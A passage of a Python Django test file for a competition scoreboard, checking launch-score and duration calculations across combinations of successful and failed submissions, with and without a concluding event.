time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 9
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFourSuccessWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 9
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampSuccessSuccessSuccessFailNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 8
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampSuccessSuccessSuccessFailWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 8
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampSuccessSuccessFailSuccessNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 8
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampSuccessSuccessFailSuccessWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 8
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampSuccessSuccessFailFailNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 7
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampSuccessSuccessFailFailWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 7
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampSuccessFailSuccessSuccessNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 8
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampSuccessFailSuccessSuccessWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 8
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampSuccessFailSuccessFailNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 7
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampSuccessFailSuccessFailWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 7
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampSuccessFailFailSuccessNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 7
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampSuccessFailFailSuccessWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 7
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampSuccessFailFailFailNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 6
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampSuccessFailFailFailWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 6
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFailSuccessSuccessSuccessNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 8
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFailSuccessSuccessSuccessWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 8
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFailSuccessSuccessFailNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 7
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFailSuccessSuccessFailWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 7
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFailSuccessFailSuccessNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
